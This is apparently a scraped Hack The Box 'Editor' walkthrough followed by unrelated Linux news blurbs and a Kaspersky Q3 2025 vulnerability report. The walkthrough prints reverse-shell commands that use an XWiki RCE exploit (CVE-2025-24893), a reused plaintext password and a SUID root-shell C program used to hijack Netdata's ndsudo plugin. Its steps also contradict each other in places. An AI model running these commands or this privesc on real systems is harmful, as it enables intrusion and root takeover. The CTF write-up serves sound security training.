Introduction to Editor:

In this write-up, we will explore the “Editor” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Editor” machine from Hack The Box by achieving the following objectives:

User Flag:

Initial enumeration identifies an XWiki service on port 8080. The footer reveals the exact version, which is vulnerable to an unauthenticated Solr RCE (CVE-2025-24893). Running a public proof of concept provides a reverse shell as the xwiki service account. Exploring the installation directory reveals the hibernate.cfg.xml file, where plaintext database credentials are stored. These credentials are valid for the local user oliver as well. Using them for SSH access grants a stable shell as oliver, which makes it possible to read the user flag.

Root Flag:

Several plugin files are owned by root, set as SUID, and still group-writable. Since oliver belongs to the netdata group, these files can be modified directly. Additionally, this access allows a small SUID helper to be compiled and uploaded, which is then used to overwrite the ndsudo plugin. Afterwards, Netdata executes this plugin with root privileges during normal operation, and therefore, the replacement immediately forces the service to run the injected payload.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sV -sC -oA initial 10.10.11.80

nmap -sV -sC -oA initial 10.10.11.80

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/editor]
└──╼ $nmap -sV -sC -oA initial 10.10.11.80 
# Nmap 7.94SVN scan initiated Wed Dec  3 23:11:12 2025 as: nmap -sV -sC -oA initial 10.10.11.80
Nmap scan report for 10.10.11.80
Host is up (0.041s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http    Jetty 10.0.20
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Type: Jetty(10.0.20)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌─[dark@parrot]─[~/Documents/htb/editor]
└──╼ $nmap -sV -sC -oA initial 10.10.11.80 
# Nmap 7.94SVN scan initiated Wed Dec  3 23:11:12 2025 as: nmap -sV -sC -oA initial 10.10.11.80
Nmap scan report for 10.10.11.80
Host is up (0.041s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http    Jetty 10.0.20
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Type: Jetty(10.0.20)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Analysis:

• Port 22 (SSH): OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 – standard secure shell service for remote access.
• Port 80 (HTTP): nginx 1.18.0 (Ubuntu) – web server acting as reverse proxy, redirects to http://editor.htb/.
• Port 8080 (HTTP): Jetty 10.0.20 running XWiki – main application with WebDAV enabled, missing HttpOnly on JSESSIONID, and robots.txt exposing edit/save/delete paths.

What is XWiki?

XWiki is a free, open-source enterprise wiki platform written in Java. Think of it as a super-powered Wikipedia-style software that companies or teams install on their own servers to create internal knowledge bases, documentation sites, collaborative portals, etc.

Web Enumeration:

Web Application Exploration:

Perform web enumeration to discover potentially exploitable directories and files.

Landing on http://editor.htb, we’re greeted by the homepage of “SimplistCode Pro” – a sleek, modern web-based code editor that looks almost identical to VS Code, complete with Ace Editor, file tree, and integrated terminal.

Accessing http://10.10.11.180:8080/xwiki/bin/view/Main/ reveals the built-in XWiki documentation page for SimplistCode Pro – confirming the actual editor runs on an XWiki instance at port 8080.

After discovering that the web service on port 8080 is an XWiki instance and confirming the exact version 15.10.8 from the footer banner, we immediately searched for public exploits.

CVE-2025-24893: Unauthenticated Remote Code Execution in XWiki Platform

CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform, an open-source enterprise wiki software. It allows any guest user (no login required) to execute arbitrary Groovy code on the server by sending a specially crafted request to the SolrSearch macro. This flaw stems from improper sandboxing and sanitisation of Groovy expressions in asynchronous macro rendering, enabling attackers to inject and execute malicious code via search parameters

This version is vulnerable to CVE-2025-24893 – an unauthenticated Remote Code Execution in the Solr search component via malicious Groovy templates.

Progressing through exploit trials

We clone the public PoC from gunzf0x’s GitHub repository: git clone https://github.com/gunzf0x/CVE-2025-24893

Testing the exploit syntax first – the script help shows mandatory flags -t (target URL) and -c (command).

Setting up our listener with nc -lvnp 9007 to catch the reverse shell.

We launch the final exploit python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c ‘bash -c “bash -i >/dev/tcp/10.10.14.189/9007 0>&1″‘ -e /bin/bash

Unfortunately, the CVE-2025-24893 exploit failed to pop a shell — no connection back to our listener—time to pivot and hunt for another path.

The exploit worked perfectly! Final command that popped the shell: python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c ‘busybox nc 10.10.14.189 9007 -e /bin/bash’ The script injected Groovy code via the vulnerable Solr search endpoint, executed busybox nc … -e /bin/bash, and gave us our reverse shell as the xwiki system user.

Achieving Initial Foothold as xwiki User on Editor machine via CVE-2025-24893

Back on our attacker box, we fire up nc -lvnp 9007. Moments later, the listener catches a connection from 10.10.11.80:59508. Running id confirms we successfully landed as xwiki (uid=997) – the exact user running the XWiki Jetty instance. Initial foothold achieved!

The shell is raw and non-interactive. We immediately stabilize it: which python3 → /usr/bin/python3 python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ Prompt changes to xwiki@editor:/usr/lib/xwiki-jetty$ – full TTY achieved, background color and everything.

Inside the limited shell as xwiki@editor, we see another user home directory called oliver. Attempting cd oliver instantly fails with Permission denied – no direct access yet, but we now know the real target user is oliver.

Quick enumeration with find / -name “xwiki” 2>/dev/null reveals all XWiki-related paths (config, data store, logs, webapps, etc.). Confirms we’re deep inside the actual XWiki installation running under Jetty.

ls in the same directory reveals the classic XWiki/Jetty config files, including the juicy hibernate.cfg.xml – this file almost always contains plaintext database credentials.

hibernate.cfg.xml credential reuse on editor machine

Full cat hibernate.cfg.xml confirms this is the real DB password used by the application. Classic misconfiguration: developers reuse the same password for the DB user and the system user oliver.

cat hibernate.cfg.xml | grep password instantly dumps multiple entries, and the first one is: theEd1t0rTeam99 Bingo – plaintext password for the XWiki database (and very often reused elsewhere).

While poking around /usr/lib/xwiki/WEB-INF/, we try su oliver and blindly guess the password theEd1t0rTeam99 (common pattern on HTB). It fails with an Authentication failure – wrong password, but we now know the exact target user is Oliver.

Attempting to SSH directly as xwiki@editor.htb results in “Permission denied, please try again.” (twice). Attackers cannot log in via password-based SSH because the xwiki system account lacks a valid password (a common setup for service accounts). We can only interact with the XWiki user via the reverse shell we already have from the CVE exploit. No direct SSH access here.

SSH as oliver

From our attacker box we can now SSH directly as oliver (optional, cleaner shell): ssh oliver@editor.htb → password theEd1t0rTeam99 → clean login

User flag successfully grabbed! We’re officially the oliver user and one step closer to root.

Escalate to Root Privileges Access on the Editor machine

Privilege Escalation:

Sorry, user oliver may not run sudo on editor. No passwordless sudo, no obvious entry in /etc/sudoers.

Only oliver’s normal processes visible: systemd user instance and our own bash/ps. No weird cronjobs, no suspicious parent processes. Confirms we need a deeper, non-obvious privesc vector.

After stabilising our shell as oliver, we immediately start hunting for privilege-escalation vectors. First, we run find / -perm 4000 2>/dev/null to enumerate SUID binaries – the output returns nothing interesting, instantly ruling out the classic GTFOBins path. To be thorough, we double-check find / -user root -perm 4000 2>/dev/null in case any root-owned SUIDs were missed, but the result is the same: no promising binaries. Straight-up SUID exploitation is off the table, so we pivot to deeper enumeration with LinPEAS and other techniques. Root will require a less obvious vector.

Linpeas Enumeration

Downloading LinPEAS into /dev/shm (tempfs, stays hidden and writable).

As oliver, we fire up LinPEAS in /dev/shm: ./linpeas.sh. The legendary green ASCII art confirms it’s running and scanning.

LinPEAS lights up the intended privesc path in bright red: a whole directory of Netdata plugins under /opt/netdata/usr/libexec/netdata/plugins.d/ are owned by root, belong to the netdata group, have the SUID bit set, and are writable by the group. Since groups oliver shows we’re in the netdata group, we can overwrite any of these binaries with our own malicious payload and instantly get a root shell the next time Netdata executes the plugin (which happens automatically every few seconds). Classic Netdata SUID misconfiguration, game over for root.

The key section “Files with Interesting Permissions” + “SUID – Check easy privesc” shows multiple Netdata plugins (like go.d.plugin, ndsudo, network-viewer.plugin, etc.) owned by root but executable/writable by the netdata group or others. Classic Netdata misconfiguration on HTB boxes.

dark.c – our tiny SUID root shell source code:

#include <unistd.h>
int main() {
    setuid(0); setgid(0);
    execle("/bin/bash", "bash", NULL);
    return 0;
}

#include <unistd.h>
int main() {
    setuid(0); setgid(0);
    execle("/bin/bash", "bash", NULL);
    return 0;
}

Compiled locally with gcc dark.c -o nvme, this will be uploaded and used to overwrite one of the writable Netdata SUID plugins.

why Nvme?

We compile our SUID shell as nvme to specifically target the Netdata plugin ndsudo at /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo. This file is root-owned, SUID, belongs to the netdata group, and is group-writable. Since oliver is in the netdata group, we can overwrite it directly. Netdata periodically runs ndsudo as root, so replacing it with our payload triggers an instant root shell. The name nvme is short, harmless-looking, and doesn’t clash with real system binaries, making it the perfect stealthy replacement. Upload → overwrite ndsudo → wait a few seconds → root. Simple and deadly effective

curl our compiled nvme from the attacker machine → download complete

chmod +x nvme → make it executable. Temporarily prepend /dev/shm to PATH so we can test it locally

When testing our malicious nvme binary with the existing ndsudo plugin (/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list), it fails with “nvme : not available in PATH.” This is expected because we haven’t overwritten ndsudo yet—it’s still the original binary, and our nvme isn’t in the PATH for this test command. It’s a quick sanity check to confirm the setup before the real overwrite. Next, we’ll copy nvme directly over ndsudo to hijack it.

An ls in /dev/shm now shows nvme is missing — we already moved or deleted it during testing. No problem: we just re-download it with curl nvme, chmod +x nvme, and we’re back in business, ready for the final overwrite of ndsudo. Payload restored, stealth intact.

We re-download our malicious nvme, chmod +x it, prepend /dev/shm to PATH, and run the trigger command /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-listWe re-download our malicious nvme, chmod +x it, prepend /dev/shm to PATH, and run the trigger command /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Root flag captured! With the Netdata plugin overwritten and triggered, we’ve spawned our SUID shell as root. Machine fully owned.

The post Hack The Box: Editor Machine Walkthrugh – Easy Difficulity appeared first on Threatninja.net.

This was another busy week in the Linux ecosystem and wider FOSS community, with an update on the way for Linux Mint, growing Steam marketshare, and much more. Here are the biggest stories you might have missed.

As Microsoft continues giving everyone reasons to drop Windows in favor of a more reliable and open platform, there's no better time to explore what Linux has to offer. Here are a few good apps worth your time if you've got a Linux computer to play with this weekend.

Cybersecurity researchers uncover a sophisticated Linux campaign that blends legacy botnet capabilities with modern evasion techniques. A newly discovered Linux malware campaign is demonstrating the evolving sophistication of threat actors by combining Mirai-derived distributed denial-of-service (DDoS) functionality with a stealthy, fileless cryptocurrency mining operation. According to research from Cyble Research & Intelligence Labs (CRIL), the […]

The post New Stealthy Linux Malware Merges Mirai-based DDoS Botnet with Fileless Cryptominer appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A Linux distribution known for its security and stability, Alpine Linux, has released version 3.23 with several improvements and upgrades to its package base. It's the first major point release since May, and it carries on support a wide range of computer architectures.

Canonical just made a massive announcement for anyone using Linux on Windows, Ubuntu Pro is now available for the Windows Subsystem for Linux (WSL), and the best part is that it is still free for personal use. If you’re a developer or a power user who relies on WSL to get work done, this is a huge deal.

In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vulnerabilities and exploits, the most common security issues impacting Windows and Linux, and the vulnerabilities being leveraged in APT attacks that lead to the launch of widespread C2 frameworks. The report utilizes anonymized Kaspersky Security Network data, which was consensually provided by our users, as well as information from open sources.

Statistics on registered vulnerabilities

This section contains statistics on registered vulnerabilities. The data is taken from cve.org.

Let us consider the number of registered CVEs by month for the last five years up to and including the third quarter of 2025.

Total published vulnerabilities by month from 2021 through 2025 (download)

As can be seen from the chart, the monthly number of vulnerabilities published in the third quarter of 2025 remains above the figures recorded in previous years. The three-month total saw over 1000 more published vulnerabilities year over year. The end of the quarter sets a rising trend in the number of registered CVEs, and we anticipate this growth to continue into the fourth quarter. Still, the overall number of published vulnerabilities is likely to drop slightly relative to the September figure by year-end

A look at the monthly distribution of vulnerabilities rated as critical upon registration (CVSS > 8.9) suggests that this metric was marginally lower in the third quarter than the 2024 figure.

Total number of critical vulnerabilities published each month from 2021 to 2025 (download)

Exploitation statistics

This section contains exploitation statistics for Q3 2025. The data draws on open sources and our telemetry.

Windows and Linux vulnerability exploitation

In Q3 2025, as before, the most common exploits targeted vulnerable Microsoft Office products.

Most Windows exploits detected by Kaspersky solutions targeted the following vulnerabilities:

• CVE-2018-0802: a remote code execution vulnerability in the Equation Editor component
• CVE-2017-11882: another remote code execution vulnerability, also affecting Equation Editor
• CVE-2017-0199: a vulnerability in Microsoft Office and WordPad that allows an attacker to assume control of the system

These vulnerabilities historically have been exploited by threat actors more frequently than others, as discussed in previous reports. In the third quarter, we also observed threat actors actively exploiting Directory Traversal vulnerabilities that arise during archive unpacking in WinRAR. While the originally published exploits for these vulnerabilities are not applicable in the wild, attackers have adapted them for their needs.

• CVE-2023-38831: a vulnerability in WinRAR that involves improper handling of objects within archive contents We discussed this vulnerability in detail in a 2024 report.
• CVE-2025-6218 (ZDI-CAN-27198): a vulnerability that enables an attacker to specify a relative path and extract files into an arbitrary directory. A malicious actor can extract the archive into a system application or startup directory to execute malicious code. For a more detailed analysis of the vulnerability, see our Q2 2025 report.
• CVE-2025-8088: a zero-day vulnerability similar to CVE-2025-6128, discovered during an analysis of APT attacks The attackers used NTFS Streams to circumvent controls on the directory into which files were unpacked. We will take a closer look at this vulnerability below.

It should be pointed out that vulnerabilities discovered in 2025 are rapidly catching up in popularity to those found in 2023.

All the CVEs mentioned can be exploited to gain initial access to vulnerable systems. We recommend promptly installing updates for the relevant software.

Dynamics of the number of Windows users encountering exploits, Q1 2023 — Q3 2025. The number of users who encountered exploits in Q1 2023 is taken as 100% (download)

According to our telemetry, the number of Windows users who encountered exploits increased in the third quarter compared to the previous reporting period. However, this figure is lower than that of Q3 2024.

For Linux devices, exploits for the following OS kernel vulnerabilities were detected most frequently:

• CVE-2022-0847, also known as Dirty Pipe: a vulnerability that allows privilege escalation and enables attackers to take control of running applications
• CVE-2019-13272: a vulnerability caused by improper handling of privilege inheritance, which can be exploited to achieve privilege escalation
• CVE-2021-22555: a heap overflow vulnerability in the Netfilter kernel subsystem. The widespread exploitation of this vulnerability is due to its use of popular memory modification techniques: manipulating “msg_msg” primitives, which leads to a Use-After-Free security flaw.

Dynamics of the number of Linux users encountering exploits, Q1 2023 — Q3 2025. The number of users who encountered exploits in Q1 2023 is taken as 100% (download)

A look at the number of users who encountered exploits suggests that it continues to grow, and in Q3 2025, it already exceeds the Q1 2023 figure by more than six times.

It is critically important to install security patches for the Linux operating system, as it is attracting more and more attention from threat actors each year – primarily due to the growing number of user devices running Linux.

Most common published exploits

In Q3 2025, exploits targeting operating system vulnerabilities continue to predominate over those targeting other software types that we track as part of our monitoring of public research, news, and PoCs. That said, the share of browser exploits significantly increased in the third quarter, matching the share of exploits in other software not part of the operating system.

Distribution of published exploits by platform, Q1 2025 (download)

Distribution of published exploits by platform, Q2 2025 (download)

Distribution of published exploits by platform, Q3 2025 (download)

It is noteworthy that no new public exploits for Microsoft Office products appeared in Q3 2025, just as none did in Q2. However, PoCs for vulnerabilities in Microsoft SharePoint were disclosed. Since these same vulnerabilities also affect OS components, we categorized them under operating system vulnerabilities.

Vulnerability exploitation in APT attacks

We analyzed data on vulnerabilities that were exploited in APT attacks during Q3 2025. The following rankings draw on our telemetry, research, and open-source data.

TOP 10 vulnerabilities exploited in APT attacks, Q3 2025 (download)

APT attacks in Q3 2025 were dominated by zero-day vulnerabilities, which were uncovered during investigations of isolated incidents. A large wave of exploitation followed their public disclosure. Judging by the list of software containing these vulnerabilities, we are witnessing the emergence of a new go-to toolkit for gaining initial access into infrastructure and executing code both on edge devices and within operating systems. It bears mentioning that long-standing vulnerabilities, such as CVE-2017-11882, allow for the use of various data formats and exploit obfuscation to bypass detection. By contrast, most new vulnerabilities require a specific input data format, which facilitates exploit detection and enables more precise tracking of their use in protected infrastructures. Nevertheless, the risk of exploitation remains quite high, so we strongly recommend applying updates already released by vendors.

C2 frameworks

In this section, we will look at the most popular C2 frameworks used by threat actors and analyze the vulnerabilities whose exploits interacted with C2 agents in APT attacks.

The chart below shows the frequency of known C2 framework usage in attacks on users during the third quarter of 2025, according to open sources.

Top 10 C2 frameworks used by APT groups to compromise user systems in Q3 2025 (download)

Metasploit, whose share increased compared to Q2, tops the list of the most prevalent C2 frameworks from the past quarter. It is followed by Sliver and Mythic. The Empire framework also reappeared on the list after being inactive in the previous reporting period. What stands out is that Adaptix C2, although fairly new, was almost immediately embraced by attackers in real-world scenarios. Analyzed sources and samples of malicious C2 agents revealed that the following vulnerabilities were used to launch them and subsequently move within the victim’s network:

• CVE-2020-1472, also known as ZeroLogon, allows for compromising a vulnerable operating system and executing commands as a privileged user.
• CVE-2021-34527, also known as PrintNightmare, exploits flaws in the Windows print spooler subsystem, also enabling remote access to a vulnerable OS and high-privilege command execution.
• CVE-2025-6218 or CVE-2025-8088 are similar Directory Traversal vulnerabilities that allow extracting files from an archive to a predefined path without the archiving utility notifying the user. The first was discovered by researchers but subsequently weaponized by attackers. The second is a zero-day vulnerability.

Interesting vulnerabilities

This section highlights the most noteworthy vulnerabilities that were publicly disclosed in Q3 2025 and have a publicly available description.

ToolShell (CVE-2025-49704 and CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771): insecure deserialization and an authentication bypass

ToolShell refers to a set of vulnerabilities in Microsoft SharePoint that allow attackers to bypass authentication and gain full control over the server.

• CVE-2025-49704 involves insecure deserialization of untrusted data, enabling attackers to execute malicious code on a vulnerable server.
• CVE-2025-49706 allows access to the server by bypassing authentication.
• CVE-2025-53770 is a patch bypass for CVE-2025-49704.
• CVE-2025-53771 is a patch bypass for CVE-2025-49706.

These vulnerabilities form one of threat actors’ combinations of choice, as they allow for compromising accessible SharePoint servers with just a few requests. Importantly, they were all patched back in July, which further underscores the importance of promptly installing critical patches. A detailed description of the ToolShell vulnerabilities can be found in our blog.

CVE-2025-8088: a directory traversal vulnerability in WinRAR

CVE-2025-8088 is very similar to CVE-2025-6218, which we discussed in our previous report. In both cases, attackers use relative paths to trick WinRAR into extracting archive contents into system directories. This version of the vulnerability differs only in that the attacker exploits Alternate Data Streams (ADS) and can use environment variables in the extraction path.

CVE-2025-41244: a privilege escalation vulnerability in VMware Aria Operations and VMware Tools

Details about this vulnerability were presented by researchers who claim it was used in real-world attacks in 2024.

At the core of the vulnerability lies the fact that an attacker can substitute the command used to launch the Service Discovery component of the VMware Aria tooling or the VMware Tools utility suite. This leads to the unprivileged attacker gaining unlimited privileges on the virtual machine. The vulnerability stems from an incorrect regular expression within the get-versions.sh script in the Service Discovery component, which is responsible for identifying the service version and runs every time a new command is passed.

Conclusion and advice

The number of recorded vulnerabilities continued to rise in Q3 2025, with some being almost immediately weaponized by attackers. The trend is likely to continue in the future.

The most common exploits for Windows are primarily used for initial system access. Furthermore, it is at this stage that APT groups are actively exploiting new vulnerabilities. To hinder attackers’ access to infrastructure, organizations should regularly audit systems for vulnerabilities and apply patches in a timely manner. These measures can be simplified and automated with Kaspersky Systems Management. Kaspersky Symphony can provide comprehensive and flexible protection against cyberattacks of any complexity.

Extended Berkeley Packet Filter (eBPF) represents one of Linux’s most powerful kernel technologies, enabling users to load sandboxed programs directly into the kernel for network packet inspection and system call monitoring. Introduced in 2015 to modernize the 1992 BPF architecture, this capability has become a double-edged sword providing unprecedented observability while simultaneously offering sophisticated attackers […]

The post BPFDoor and Symbiote: Advanced eBPF-Based Rootkits Target Linux Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

FreeBSD, the open-source operating system, just released a new major update. FreeBSD 15 includes overhauled package management, new versions of utilities like OpenZFS and OpenSSL, and the end of support for most 32-bit hardware.

Linux usage on Steam has officially hit an all-time high, reaching 3.2% market share according to the Steam Survey results for November 2025. This is fantastic news for the open-source community, and it shows that the momentum driven by Valve’s hardware strategy isn't slowing down at all.

Homebrew, the package manager for macOS and Linux, just got a handy new feature in the latest v5.0.4 update. Brewfile install scripts are now more like a one-stop shop for installing software, as Flatpaks are now supported alongside Brew packages, Mac App Store Apps, and other packages.

Linux Mint's development team made a blog post today announcing a nickname for the upcoming 22.3 release, as well as estimating the arrival date of the first beta release and listing some specific new features we can look forward to.

If you've ever maintained a configuration for an extensible text editor, you'll know it can become a full-blown software project. Making a disaster of it like I did means that adding a new feature fills you with dread. LazyVim tackles that problem with some awesome features, and I'll explain how.

The Linux 6.18 stable kernel has officially been released, bringing a lot of major performance improvements and crucial hardware support. This new kernel is packed with features, touching everything from storage and networking to graphics and Apple hardware support.

Remember when Intel launched its Arrow Lake-S desktop processors (the Core Ultra 200S series) late last year? The reception was a bit lukewarm. But new data shows it’s been quietly getting way better with age. According to some fresh benchmarks from Phoronix, the flagship Core Ultra 9 285K is now running about 9% faster on […]

The post Your Arrow Lake PC may suddenly feel faster, here’s why appeared first on Digital Trends.

Linus Torvalds has officially released Linux 6.18, the latest stable version of the Linux kernel. The announcement came on Sunday, November 30, 2025, marking another milestone for the open-source operating system that powers everything from smartphones to supercomputers. Torvalds shared the news through the Linux kernel mailing list, noting that while there was more bugfixing […]

The post Linux 6.18 Rolls Out With Major Hardware Support Upgrades and Driver Enhancements appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read more of this story at Slashdot.

Self-hosting is a great way to save money on subscriptions and take control of your data, but getting everything running smoothly on one system can be difficult, especially if you have incompatible dependencies.

If you're like me, you don't like unnecessary friction when trying to accomplish tasks on your Linux PC. The following desktop software is so useful to me, I want them to be running when I start using my computer so that I don't have to manually launch them.

The first time I gave money to a Linux project felt weird. I'd been playing with one distro or another for a while, never quite figuring it out. Then Ubuntu Linux launched just as I started college, and because we all had bad internet, they sent me an installation disc for free.